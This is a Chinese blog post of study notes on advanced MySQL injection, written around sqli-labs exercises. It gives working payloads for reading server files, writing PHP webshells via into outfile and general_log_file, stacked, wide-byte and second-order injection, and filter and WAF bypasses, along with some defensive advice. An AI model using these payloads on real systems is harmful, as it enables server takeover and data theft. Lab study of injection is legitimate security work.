<li>  <a target="_blank" rel="noopener" href="https://corp0ra1.github.io/2019/05/22/%E5%9F%BA%E4%BA%8E%E6%8A%A5%E9%94%99%E7%9A%84%E6%B3%A8%E5%85%A5/#%E5%8A%A0%E9%A4%90">sql之基于报错的注入</a></li>
<li><a target="_blank" rel="noopener" href="https://corp0ra1.github.io/2019/05/22/%E6%B3%A8%E5%85%A5%E5%86%8D%E6%8E%A2/">sql注入再探</a></li>
</ul>
<h1 id="高级方法"><a href="#高级方法" class="headerlink" title="高级方法"></a>高级方法</h1><h2 id="导入导出文件"><a href="#导入导出文件" class="headerlink" title="导入导出文件"></a>导入导出文件</h2><h3 id="load-file-导出文件"><a href="#load-file-导出文件" class="headerlink" title="load_file()导出文件"></a>load_file()导出文件</h3><p>Load_file(file_name):读取文件并返回该文件的内容作为一个字符串。<br><strong>使用条件</strong>:</p>
<ul>
<li><p> 必须有权限读取并且文件必须完全可读</p>
<blockquote>
<p>and (select count(<em>) from mysql.user)&gt;0/</em> 如果结果返回正常,说明具有读写权限。<br>and (select count(<em>) from mysql.user)&gt;0/</em> 返回错误,应该是管理员给数据库帐户降权</p>
</blockquote>
</li>
<li><p>   欲读取文件必须在服务器上</p>
</li>
<li><p>   必须指定文件完整的路径</p>
</li>
<li><p>   文件内容必须小于max_allowed_packet</p>
</li>
</ul>
<p>如果该文件不存在,或因为上面的任一原因而不能被读出,函数返回空。比较难满足的就是权限,在 windows 下,如果 NTFS 设置得当,是不能读取相关的文件的,当遇到只有administrators 才能访问的文件,users 就别想 load_file 出来。<br><strong>在实际的注入中,我们有两个难点需要解决:</strong></p>
<ul>
<li>   绝对物理路径</li>
<li>   构造有效的畸形语句 (报错爆出绝对路径)</li>
</ul>
<p>在很多 PHP 程序中,当提交一个错误的 Query,如果 display_errors = on,程序就会暴露WEB 目录的绝对路径,只要知道路径,那么对于一个可以注入的 PHP 程序来说,整个服务器的安全将受到严重的威胁。<br><strong>编码思路</strong>：</p>
<ol>
<li><p>路径使用\ ，否则会被当作转义符号</p>
<blockquote>
<p>-1 union select 1,1,1,load_file(c:\boot.ini)<br>Explain:路径里的/用 \代替</p>
</blockquote>
</li>
<li><p>   盘符根路径下可用c:admin.txt</p>
</li>
<li><p>16进制文件名处理</p>
<blockquote>
<p>-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)<br>Explain:“c:/boot.ini”的 16 进制是“0x633a2f626f6f742e696e69”</p>
</blockquote>
</li>
<li><p>char(路径ascii)</p>
<blockquote>
<p>-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))<br>Explain:“char(99,58,47,98,111,111,116,46,105,110,105)”就是“c:/boot.ini”的 ASCII 代码</p>
</blockquote>
</li>
</ol>
<h3 id="load-data-intofile导入文件到数据库"><a href="#load-data-intofile导入文件到数据库" class="headerlink" title="load data intofile导入文件到数据库"></a>load data intofile导入文件到数据库</h3><p>LOAD DATA INFILE 语句用于高速地从一个文本文件中读取行,并装入一个表中。文件名称必须为一个文字字符串。<br>在注入过程中,我们往往需要一些特殊的文件,比如配置文件,密码文件等。当你具有数据库的权限时,可以将系统文件利用 load data infile 导入到数据库中。<br>先将服务器端文件导入进数据库，然后从数据库中把数据select出来到攻击者的电脑中。就好像数据库是数据在服务器与攻击者之间的中介机构</p>
<blockquote>
<p>示例:load data infile ‘/tmp/t0.txt’ ignore into table t0 character set gbk fields terminated by ‘\t’<br>lines terminated by ‘\n’</p>
</blockquote>
<h3 id="select……into-outfile-‘file-name’-导入到文件"><a href="#select……into-outfile-‘file-name’-导入到文件" class="headerlink" title="select……into outfile ‘file_name’ 导入到文件"></a>select……into outfile ‘file_name’ 导入到文件</h3><p>可以把被选择的行写入一个文件中。该文件被创建到服务器主机上,因此您必须拥有 FILE写入权限,才能使用此语法。file_name 不能是一个已经存在的文件。<br>我们一般有两种利用形式:</p>
<ul>
<li><pre><code>第一种直接将 select 内容导入到文件中:
  `Select version() into outfile “c:\\phpnow\\htdocs\\test.php”`
  此处将 version()替换成一句话,&lt;?php @eval($_post[“mima”])?&gt;也即
  Select &lt;?php @eval($_post[“mima”])?&gt; into outfile “c:\\phpnow\\htdocs\\test.php”
  直接连接一句话就可以了,其实在 select 内容中不仅仅是可以上传一句话的,也可以上传很
  多的内容。
</code></pre>
</li>
<li><pre><code>第二种修改文件结尾:
  Select version() Into outfile “c:\\phpnow\\htdocs\\test.php” LINES TERMINATED BY 0x16 进制文
  件
  解释:通常是用‘\r\n’结尾,此处我们修改为自己想要的任何文件。同时可以用 FIELDS
  TERMINATED BY
  16 进制可以为一句话或者其他任何的代码,可自行构造。在 sqlmap 中 os-shell 采取的就是
  这样的方式,具体可参考 os-shell 分析文章: http://www.cnblogs.com/lcamry/p/5505110.html
</code></pre>
</li>
</ul>
<p><strong>TIPS</strong>:<br>(1)可能在文件路径当中要注意转义,这个要看具体的环境<br>(2)上述我们提到了 load_file(),但是当前台无法导出数据的时候,我们可以利用下面的语<br>句:<br><code>select load_file(‘c:\\wamp\\bin\\mysql\\mysql5.6.17\\my.ini’)into outfile ‘c:\\wamp\\www\\test.php’</code><br>可以利用该语句将服务器当中的内容导入到 web 服务器下的目录,这样就可以得到数据了。<br>上述 my.ini 当中存在 password 项(不过默认被注释),当然会有很多的内容可以被导出来,这个要平时积累</p>
<h3 id="secure-file-priv"><a href="#secure-file-priv" class="headerlink" title="secure_file_priv"></a>secure_file_priv</h3><p>高版本的MYSQL添加了一个新的特性secure_file_priv，用来限制数据导入和导出操作，例如由LOAD DATA 和SELECT…INTO OUTFILE语句和LOAD_FILE()函数执行的行为。<br>如何查看mysql是否开启了文件导入导出,即对应的secure_file_priv的值？</p>
<blockquote>
<p><code>mysql&gt;show global variables like &#39;%secure%&#39;;</code><br>如果secure_file_priv的值为null，则没开启；如果为空，则开启；如果为目录，则说明只能在该目录下操作。<br>在MySQL 5.5.53版本之前，这个变量默认为空，因此我们就可以使用这些函数。但是在该版本之后，mysql该值默认为NULL值，因此会禁用这些函数。</p>
</blockquote>
<p>Secure_file_priv是一个全局变量且是一个只读变量，也就是说在运行时无法更改。<br>那么如何修改secure_file_priv？（为了搭建环境）</p>
<ul>
<li>   windows下：修改my.ini 在[mysqld]内加入secure_file_priv =xxx</li>
<li>   linux下：修改/etc/my.cnf 在[mysqld]内加入secure_file_priv =xxx<br>然后重启mysql，再查询secure_file_priv</li>
</ul>
<p>mysql高版本的配置文件中默认没有secure_file_priv这个选项，但是你用SQL语句来查看secure_file_priv发现，没配置这个选项就是NULL，也就是说无法导出文件。</p>
<h3 id="常用路径"><a href="#常用路径" class="headerlink" title="常用路径"></a>常用路径</h3><p>《天书》里面收集的常用导入导出文件路径：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/lcamry/p/5729087.html">传送门</a></p>
<h3 id="通过log日志文件写入shell-好用极了！"><a href="#通过log日志文件写入shell-好用极了！" class="headerlink" title="通过log日志文件写入shell(好用极了！)"></a>通过log日志文件写入shell(好用极了！)</h3><p>通过Mysql root账号general_log_file方法获取webshell，<a target="_blank" rel="noopener" href="https://www.freebuf.com/column/143125.html">传送门</a></p>
<blockquote>
<p>set global general_log=on;set global general_log_file=’/var/www/tony.php’;select ‘<?php eval($_POST[tony]) ?>‘;</p>
</blockquote>
<p>mysql打开general log之后，所有的查询语句都可以在general log文件中以可读的方式得到，但是这样general log文件会非常大，所以默认都是关闭的。有的时候为了查错等原因，还是需要暂时打开general log的。换句话说general_log_file会记录所有的查询语句，以原始的状态来显示，如果将general_log开关打开，general_log_file设置为一个php文件，则查询的操作将会全部写入到general_log_file指定的文件，通过访问general_log_file指定的文件来获取webshell</p>
<ul>
<li>   mysql是最好用root账号运行的，因为他要往对应的文件夹里写入文件，没有权限就很蛋疼</li>
<li>   最好写入html运行网页目录下，这样直接可以执行，不需要调用文件包含漏洞</li>
<li>   存在一定问题：即你把人家log打开，如果不关闭，在网站sql请求量巨大的时候，可能导致文件的大小过大而出现意想不到的问题，因此记得及时关闭</li>
<li>  在我的Ubuntu下，只能写入到var/tmp目录下，即使我给/var/www 777的权限也无法写入,因为我<a target="_blank" rel="noopener" href="http://www.111cn.net/database/mysql/46839.htm">Ubuntu的mysqld在强制模式</a>中,所以拒绝写入，改下配置文件即可复现</li>
</ul>
<h2 id="增删改而非查"><a href="#增删改而非查" class="headerlink" title="增删改而非查"></a>增删改而非查</h2><p>掌握它的结构 从而才能构造出合理的语句！<a target="_blank" rel="noopener" href="https://dev.mysql.com/doc/refman/8.0/en/sql-syntax-data-definition.html">mysql官方语法传送门</a><br>select更常见是因为大部分用户大部分操作都是去查询数据。而对于用户增删改数据的地方，很少见而且可控参数很少。但是只要有，则可以尝试！<br>利用方法和select类似，只需要有个成功与否反馈即可构造和select查询一样的效果。不过更多都是基于报错，基于updatexml这个XPATH的漏洞进行注入</p>
<h3 id="增-insert"><a href="#增-insert" class="headerlink" title="增_insert"></a>增_insert</h3><h3 id="删-delete"><a href="#删-delete" class="headerlink" title="删_delete"></a>删_delete</h3><p>删数据:<br>delete from 表名;<br>delete from 表名 where id=1;<br>删除结构:<br>删数据库:drop database 数据库名;<br>删除表:drop table 表名;<br>删除表中的列:alter table 表名 drop column 列名;</p>
<h3 id="改-updata"><a href="#改-updata" class="headerlink" title="改_updata"></a>改_updata</h3><p>修改所有:updata 表名 set 列名=’新的值,非数字加单引号’ ;<br>带条件的修改:updata 表名 set 列名=’新的值,非数字加单引号’ where id=6;</p>
<h2 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h2><ul>
<li>  <a target="_blank" rel="noopener" href="https://haiderm.com/second-order-sql-injection-explained-with-example/">文字版</a>：就是对输入的数据进行处理后存储，但是没有对取出来的数据进行处理，即导致的原因是信任存储进去的脏数据</li>
<li>  <a target="_blank" rel="noopener" href="https://haiderm.com/second-order-sql-injection-explained-with-example/">youtube视频</a></li>
<li>  国内的文章搜索：二次注入即可</li>
<li><strong>个人见解</strong>：比如less24，可对比查看我的分析过程 即可明白<blockquote>
<p>注册账户admin’#，经过mysql_escape_string处理之后为admin\ ‘\ #，存进去用户名为admin’#，此时不存在注入。但是在其他地方，比如更新密码，<code>UPDATE users SET PASSWORD=&#39;6&#39; where username=&#39;admin&#39;#&#39; and password=&#39;&#39;</code>，就导致了修改admin的密码了，也就是二次注入</p>
</blockquote>
</li>
</ul>
<p>二次排序注入思路:</p>
<ol>
<li>黑客通过构造数据的形式,在浏览器或者其他软件中提交 HTTP 数据报文请求到服务<br>端进行处理,提交的数据报文请求中可能包含了黑客构造的 SQL 语句或者命令。</li>
<li>服务端应用程序会将黑客提交的数据信息进行存储,通常是保存在数据库中,保存的<br>数据信息的主要作用是为应用程序执行其他功能提供原始输入数据并对客户端请求做出响<br>应。</li>
<li>黑客向服务端发送第二个与第一次不相同的请求数据信息。</li>
<li>服务端接收到黑客提交的第二个请求信息后,为了处理该请求,服务端会查询数据库<br>中已经存储的数据信息并处理,从而导致黑客在第一次请求中构造的 SQL 语句或者命令在服<br>务端环境中执行。</li>
<li>服务端返回执行的处理结果数据信息,黑客可以通过返回的结果数据信息判断二次注<br>入漏洞利用是否成功。</li>
</ol>
<h2 id="基础过滤"><a href="#基础过滤" class="headerlink" title="基础过滤"></a>基础过滤</h2><h3 id="正则"><a href="#正则" class="headerlink" title="正则"></a>正则</h3><p>正则模式修正符 <a target="_blank" rel="noopener" href="https://blog.csdn.net/forest_fire/article/details/50944901">传送门</a><br>i：不区分大小写<br>m：将模式视为多行，^ 和 <code>$</code>都可以匹配每一行的开头和结尾（默认 即使是多行的数据 ^ <code>$</code>只能匹配整个多行数据的开头和结尾）<br>s：使得.能够匹配换行符（默认的.不能表示换行符号，即.匹配到换行符自动中断匹配）</p>
<blockquote>
<p>如果正则表达式只匹配一次，则可以通过双写绕过</p>
</blockquote>
<h3 id="and-or"><a href="#and-or" class="headerlink" title="and  or"></a>and  or</h3><p>||  &amp;&amp;<br>或者考虑异或注入，1^1=0 1^0=1来判断</p>
<h3 id="空格"><a href="#空格" class="headerlink" title="空格"></a>空格</h3><p>字符|含义<br>| – | – |<br>%09|TAB 键(水平)<br>%0a|新建一行<br>%0c|新的一页<br>%0d|return 功能<br>%0b|TAB 键(垂直)<br>%a0|空格</p>
<p>上述都可以过<code>&#39;/[ +]/&#39;</code>的匹配，但是只有%a0可过/s的正则匹配（Ubuntu环境下可行，win没尝试）</p>
<p>当然还有/**/ 以及括号包含的格式来过空格，括号当然最好，因为/*老被过滤</p>
<h3 id="注释符"><a href="#注释符" class="headerlink" title="注释符"></a>注释符</h3><p>– #被过滤了，/*又不能单独使用，此时目前我想到的就只能是基于闭合了，就是构造最后一个参数去闭合</p>
<h2 id="HPP"><a href="#HPP" class="headerlink" title="HPP"></a>HPP</h2><p><strong>这个与服务器的架构有关系</strong><br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190607113234.png" srcset="/img/loading.gif" lazyload alt="20190607113234.png"><br>服务器端有两个部分:第一部分为 tomcat 为引擎的 jsp 型服务器,第二部分为 apache为引擎的 php 服务器,真正提供 web 服务的是 php 服务器。工作流程为: client 访问服务器,能直接访问到 tomcat 服务器,然后 tomcat 服务器再向 apache 服务器请求数据。数据返回路径则相反。</p>
<p><strong>以下为大多数服务器对于参数解析的介绍</strong><br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190607113332.png" srcset="/img/loading.gif" lazyload alt="20190607113332.png"><br>比如百度就是第一个参数，Yahoo获取第二个，GOOGle获取第三个，<a target="_blank" rel="noopener" href="https://www.cnblogs.com/backlion/p/8556150.html">传送门</a><br><strong>HPP原理</strong><br>此处我们想一个问题:index.jsp?id=1&amp;id=2 请求,针对第一张图中的服务器配置情况,客户端请求首先过 tomcat,tomcat 解析第一个参数,接下来 tomcat 去请求 apache(php)服务器,apache 解析最后一个参数。那最终返回客户端的应该是哪个参数?<br>Answer:此处应该是 id=2 的内容,应为时间上提供服务的是 apache(php)服务器,返回的数据也应该是 apache 处理的数据。而在我们实际应用中,也是有两层服务器的情况,那为什么要这么做?是因为我们往往在 tomcat 服务器处做数据过滤和处理,功能类似为一个 WAF。而正因为解析参数的不同,我们此处可以利用该原理绕过 WAF 的检测。该用法就是 HPP(HTTP Parameter Pollution),http 参数污染攻击的一个应用。HPP 可对服务器和客户端都能够造成一定的威胁。<br><strong>防护之道</strong><br>1.HPP是一种新的注入型漏洞。要防止这种漏洞，除了要做好对输入参数的格式验证外，另外还需要意识到HTTP协议是允许同名的参数的，在整个应用的处理过程中要意识到这一点从而根据业务的特征对这样的情况作正确的处理。<br>2.让WAF或其他网关设备（比如IPS）在检查URL时，对同一个参数被多次赋值的情况进行特殊处理。由于HTTP协议允许相同参数在URL中多次出现，因此这种特殊处理需要注意避免误杀的情况<br>3.在代码层面，编写WEB程序时，要通过合理的$_GET方法获取URL中的参数值，而尝试获取web服务器返回给程序的其他值时要慎重处理。</p>
<h2 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h2><p><strong>原理</strong><br>宽字节注入原理即是利用编码转换，将服务器端强制添加的本来用于转义的\符号吃掉，从而能使攻击者输入的引号起到闭合作用，以至于可以进行SQL注入。<br><strong>限制</strong><br>宽字节对转义字符的影响发生在character_set_client=gbk的情况，也就是说，如果客户端发送的数据字符集是gbk，则可能会吃掉转义字符\，从而导致转义消毒失败<br><strong>需要了解的编码传递过程</strong><br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/GetImage.jpeg" srcset="/img/loading.gif" lazyload><br>具体参考该网页<a target="_blank" rel="noopener" href="https://www.lulublog.cn/post/73">传送门</a><br><strong>思路</strong><br>想办法将 ‘ 前面添加的 \ 除掉,一般有两种思路:</p>
<ol>
<li> %df 吃掉 \具体的原因是 urlencode(‘\ ) = %5c%27,我们在%5c%27 前面添加%df,形成%df%5c%27,而上面提到的 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字,此时%df%5c 就是一个汉字, %27 则作为一个单独的符号在外面,同时也就达到了我们的目的。</li>
<li> 将 \’ 中的 \ 过滤掉,例如可以构造 %**%5c%5c%27 的情况,后面的%5c 会被前面的%5c给注释掉。</li>
</ol>
<p><strong>个人总结</strong></p>
<details>
计算机的本质还是010101的编码,取决于你是怎么看待这串代码！
-   为什么加了/之后可以绕过？ 
在数据从客户端client传输到服务器段的connetion的时候，会对比这两个字符集，然后对010101的字符串在进行修改（参考Unicode转UTF-8在前面的10xxxx） 
而'的逃逸就发生在这个过程，由于connection翻译之后，会把翻译出来的东西进行拆解或者说是预处理（比如‘1\’string转int 以及实体化'的过程 ）在这个过程中 又会对一部分上传来的编码进行省略处理，以及重新编码%bf%5c进行GBK组合成汉字，造成‘逃逸 
connetion再到数据库内部查询还得还得看内部字符集，又是一层编码!，不过这个不影响 
-   “character_set_client=BINARY”为什么可以防绕？ 
“character_set_client=BINARY”，即使“不做转换、直接存储”，那么mysql在解析sql之前，sql中a的内容还是%df%5c' 
-   为什么My_real_ecape_string可以？ 
My_real_ecape_string在执行前会考虑到连接的当前字符集。

<ul>
<li>  为什么会出现乱码？<br>内部字符集出来，转换成result字符集又是一层编码，也就是这个过程造成的 </li>
</ul>
<p>所以再说一次！本质是010101，关键是你怎么看待</p>
</details>

<p>上面的是我很久之前的总结，现在感觉有点啰嗦。让我重新再啰嗦一次吧<br>核心在于编码的问题<br>而且在于Apache端和mysql数据端的编码方式不同，从而导致的问题<br>Apache端 %df %27，因为这个不能组合构成一个字，所以单独把他们看做 x’，进而转义之后给’之前加了个%5c，形成%df%5c%27，当传递到MySQL数据库端的时候，从前大到后扫描，因为默认GBK，把%df%5c可以看做一个整体X，进而形成X’，从而导致%27即‘的逃逸（因为%df无法用字符表示，这里用x代替，%df%5c===&gt;X）</p>
<p><strong>为什么是0xBF，其他编码可以吗</strong><br>想要0xXY能够吞掉转义“’”的转义符“\”需要满足以下几个条件： </p>
<ul>
<li>  0xXY不是有效字符编码 </li>
<li>  0xXY27不是有效字符编码 </li>
<li>  0xXY5C是有效字符编码 </li>
</ul>
<p>满足这一条件的只有0xBF吗？当然不，GBK编码中的单字节字符完全兼容ASCII编码，双字节字符的总体编码范围为0x8140 ~ 0xFEFE，首字节在0x81 ~ 0xFE之间，尾字节在0x40~0xFE之间，剔除0xXX7F一条线。 </p>
<blockquote>
<p>同一个编码文件里，怎么区分ASCII和中文编码呢？从ASCII表我们知道标准ASCII只有128个字符:0~ 127即0x00~ 0x7F（0111 1111）。所以区分的方法就是，高字节的最高位为0则为ASCII，为1则为中文。(所以ascii和中文编码，是以0x8开始，但是为啥不是0x80，而是0x81开始？这就..太远了，反正龟腚！) </p>
</blockquote>
<p>我们注意到，尾字节范围在0x40<del>0xFE之间，0x27不在此范围内，0x5C恰巧在此范围内。所以0xbf可以和0x5c组合却不能和0x27组合<br>同时能够吞掉转义“’”的转义符“\”的0xXY有很多很多，远不止0xBF一个。<br>只要0xXY在0x81</del>0xFE之间就都可以达到此效果。经过自己fuzzer之后确实如此！！！<br>为何网上广为流传的会是0xBF呢？类似0xAA这样的组合多好记啊。这些人有病病呢！难道是发明这个漏洞的人叫BoyFriend？（手动狗头）<br><strong>只有GBK编码有此问题吗</strong><br>只有GBK编码中存在神奇的0xXY可以吞掉“\”，在其他编码中是否也存在这样的0xXY呢？<br>gb2312和GBK同源同根，GBK是gb2312的扩充，对GBK有效的0xXY对gb2312也有效。<br>除了gb2312和GBK外，我们最常见的字符编码便是UTF-8了。UTF-8中存在特殊的0xXY吗？很遗憾，并不存在。<br>下面这段UTF-8的编码规则摘自参考文献[3]： </p>
<blockquote>
<p>UTF-8是一种变长字节编码方式。对于某一个字符的UTF-8编码，如果只有一个字节则其最高二进制位为0；如果是多字节，其第一个字节从最高位开始，连续的二进制位值为1的个数决定了其编码的位数，其余各字节均以10开头。UTF-8最多可用到6个字节。<br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190607171626.png" srcset="/img/loading.gif" lazyload alt="20190607171626.png"></p>
</blockquote>
<p>由上表可知：UTF-8第一字节的取值范围是：00-7F、C2-F4<br>然后根据RFC 3629规范，又有一些字节值是不允许出现在UTF-8编码中的：<br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190607171712.png" srcset="/img/loading.gif" lazyload alt="20190607171712.png"><br>可见，UTF-8中多字节字符的每个节的最高位一定是1，而0x5C的最高位为0，<br>所以并不存在0xXY，使得0xXY5C是效字符编码，也不存在0xXYZW，使得0xXYZW5C是效字符编码。<br>所以，UTF-8编码无此5C绕过的问题。<br><strong>为什么这么多人用？utf-8天下大统？</strong><br>网页编写UTF-8和GBK哪个编码好，根据个人需要，如果你主要做中文程序的开发，客户也主要是中国人的话就用GBK吧，因为UTF-8编码的中文使用了三个字节，用GBK节省了空间。如果做英文网站开发，还是用utf-8吧，因为utf-8中英文只占一个字节。GBK中英文也是两个字节的，并且国外客户访问GBK要下载语言包。如果你的网站是中文的，但国外用户也不少，最好也用UTF-8的吧。<br>尽管现在呼吁所有的程序都使用unicode编码，所有的网站都使用utf-8编码，来一个统一的国际规范。但仍然有很多，包括国内及国外（特别是非英语国家）的一些cms，仍然使用着自己国家的一套编码，比如gbk，作为自己默认的编码类型。也有一些cms为了考虑老用户，所以出了gbk和utf-8两个版本。<br><strong>SET NAMES gbk和Mysql_set_charset的区别</strong><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/caoxiaohong1005/article/details/70255352">传送门</a><br>我推荐直接调到结尾，看函数执行过程，以及对应的输出结果就行<br>只可意会不可言传：只有mysql_real_escape_string()前需要指定mysql连接字符集即使用mysql_set_charset()，这样使用GBK才是安全的<br><strong>怎么防范</strong></p>
<ul>
<li>  正确使用mysql_real_escape_string()前需要指定mysql连接字符集即使用mysql_set_charset()函数，如果不指定字符集且使用的字符编码是类似GBK的宽字符，可能导致宽字符注入。</li>
<li>  MySQL采用GBK编码在设置连接字符集的时候要当心，设置错误就可能会导致乱码或者宽字节注入漏洞，使用UTF8编码应该可以规避宽字节注入问题。另外提一点，GB2312也没有这个问题，GB2312的编码范围和GBK其实是不同的 </li>
</ul>
<p><strong>补充</strong><br><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/mysql-charset-trick.html#0x05">P牛的一篇文章</a></p>
<h2 id="堆叠注入"><a href="#堆叠注入" class="headerlink" title="堆叠注入"></a>堆叠注入</h2><blockquote>
<p>Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在 mysql 中,主要是命令行中,每一条语句结<br>尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。</p>
</blockquote>
<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>在 SQL 中,分号(;)是用来表示一条 sql 语句的结束。试想一下我们在 ; 结束一个 sql<br>语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而 union<br>injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union<br>或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是<br>任意的语句。</p>
<h3 id="局限性"><a href="#局限性" class="headerlink" title="局限性"></a>局限性</h3><p>堆叠注入的局限性在于并不是每一个环境下都可以执行，<strong>可能受到 API 或者数据库引擎<br>不支持的限制</strong>,当然了<strong>权限不足</strong>也可以解释为什么攻击者无法修改数据或者调用一些程序。<br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190609114659.png" srcset="/img/loading.gif" lazyload alt="20190609114659.png"></p>
<blockquote>
<p>Ps:此图是从原文中截取过来的,因为我个人的测试环境是 php+mysql,是可以执行的,此<br>处对于 mysql/php 存在质疑。但个人估计原文作者可能与我的版本的不同的原因。</p>
</blockquote>
<p>虽然我们前面提到了堆叠查询可以执行任意的 sql 语句,但是这种注入方式并不是十分<br>的完美的。<strong>在我们的 web 系统中,因为代码通常只返回一个查询结果</strong>,因此,堆叠注入第<br>二个语句产生错误或者结果只能被忽略,我们在前端界面是无法看到返回结果的。<br>因此,在读取数据时,我们建议使用 union(联合)注入。同时在使用堆叠注入之前,<br>我们也是需要知道一些数据库相关信息的,例如表名,列名等信息。</p>
<h3 id="场景"><a href="#场景" class="headerlink" title="场景"></a>场景</h3><p>之所以能使用堆叠注入和后台的实现方法有关，比如说less38之前的几关就不能使用堆叠注入。而less38可以使用是因为PHP页面调用sql语句时用的是mysqli_multi_query()函数，所以此时可以使用堆叠注入</p>
<h3 id="防护之道"><a href="#防护之道" class="headerlink" title="防护之道"></a>防护之道</h3><p>根据p牛小密圈所说：<code>因为PDO的出现，多句执行已经是趋势了，目前只有两个选择mysqli和pdo，但是官方推荐的是PDO，而且大多框架用的是PDO，那么PDO一定能多句执行吗？2014年之前的确实如此，而在5.5，5.6之后可以在PDO：：MYSQL_ATTR_MULTI_STATEMENTS里面明确指定开关，但是默认还是开的，你只需要手工禁用即可</code></p>
<h3 id="补充-1"><a href="#补充-1" class="headerlink" title="补充"></a>补充</h3><p>针对19年的强网杯的随便注这道题，考验的就是堆叠注入绕过对select的过滤，有三种方法</p>
<ol>
<li>   show table,同时改表名列名绕过<a target="_blank" rel="noopener" href="https://altman.vip/2019/05/27/QWB2019-writeup/#%E9%9A%8F%E4%BE%BF%E6%B3%A8"></a></li>
<li>   利用concat函数绕过<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/5282?accounttraceid=bc0c17b4-6e92-4883-ab5b-d929454bbbc7#toc-2"></a>:<code>set @sql=concat(&#39;sel&#39;,&#39;ect * from &#39;1919810931114514&#39;&#39;);prepare presql from @sql;execute presql;</code></li>
<li>   利用hex编码绕过,将②的set端的语句 改成hex编码即可，这样就可以不用concat拼接了。参考P牛的文章<a target="_blank" rel="noopener" href="https://t.zsxq.com/6Y7yVZ3">传送门</a><h3 id="补充！"><a href="#补充！" class="headerlink" title="补充！"></a>补充！</h3>当只显示第一条结果的时候<br>既然我们可以增删改，除了按照《mysql注入天书》里面的插入或者删除数据，我们更可以利用之前的select去写入 load文件<br>而且目前我在less38上面尝试通过log日志文件写入shell成功,而且这个方法不限于secure_file_priv的影响<br><code>http://sql.com/Less-38/?id=1&#39;;set global general_log=on;set global general_log_file=&#39;/tmp/tony.php&#39;;select &#39;&lt;?php eval($_POST[tony]) ?&gt;&#39;;%23</code></li>
</ol>
<h2 id="order-by注入"><a href="#order-by注入" class="headerlink" title="order by注入"></a>order by注入</h2><h3 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h3><p>看下select的语法规则<br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190611220719.png" srcset="/img/loading.gif" lazyload alt="20190611220719.png"><br>order  by后面可以跟上列名，表达式，或者位置+ASC/DESC指定升降序<br>既然可以跟上表达式，于是就可以构造！<br><strong>利用</strong><br>构造表达式，原理类似于bool盲注<br>如果构造的表达式是真的，order by 1，此时显示的一种结果<br>如果构造的表达式为假的，ordey by 0,此时显示的另外一种结果</p>
<h3 id="一次自以为然的尝试"><a href="#一次自以为然的尝试" class="headerlink" title="一次自以为然的尝试"></a>一次自以为然的尝试</h3><p><strong>我以为的方式</strong></p>
<ol>
<li>   直接bool：order by if(length(database())=8,1,0)</li>
<li>   报错bool:order by exp((length(database())=8)*710)</li>
<li>   延迟bool:order by if(length(database()=8),sleep(5),1)<br>呵，傻屌《天书》，要什么rand函数，直接撸1 0不就行了吗？</li>
</ol>
<p><strong>尝试之后发现</strong></p>
<ol>
<li>比如最开始的第一种，无论怎么更换length()=7，或者if(xx,1,2)等等<br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190611223348.png" srcset="/img/loading.gif" lazyload alt="20190611223348.png"><br> 无论怎么换都是一样的结果？excuse me?</li>
<li>尝试直接测试select if(xx,1,2)的返回值<br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190611223223.png" srcset="/img/loading.gif" lazyload alt="20190611223223.png"><br> 是非1即2啊</li>
<li>我再次尝试下直接order by 1  2<br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190611223442.png" srcset="/img/loading.gif" lazyload alt="20190611223442.png"><br> 我直接order by 1 2显示的结果都不同</li>
<li> 为啥构造的就不行呢？<br>然后突然意识到了，貌似或者可能是因为返回值是个字符串的原因<br>再直接拿着字符串版本测试<br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190611230113.png" srcset="/img/loading.gif" lazyload alt="20190611230113.png"><br>测试了下好像就是如此（“xxx”xxx为任意字符都是一样的结果）<br>还尝试了<code>BY 2+(&quot;2&quot;=1)</code>，<code>1+(&quot;2&quot;=1)</code>这种想利用加法来强制类型转换都返回的是没变化的结果（有的人的版本可行！我的不行）</li>
<li> 不仅如此，我还进行了字段名带不带双引号的测试<br><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190611230726.png" srcset="/img/loading.gif" lazyload alt="20190611230726.png"><br>恩，就是因为返回值是个字符串，带引号导致的！</li>
<li> 搜了下文章，得到一个结论<a target="_blank" rel="noopener" href="https://blog.csdn.net/u010757785/article/details/84619941">传送门</a>：<strong>排序正常只有int类型才起作用</strong><h3 id="反思"><a href="#反思" class="headerlink" title="反思"></a>反思</h3></li>
</ol>
<p><strong>这就是为什么要rand在外面套一层的原因：string转Int啊</strong></p>
<ul>
<li>   rand好像这个随机几率影响判断哇，参考前面floor报错反复执行的结果却不同？<blockquote>
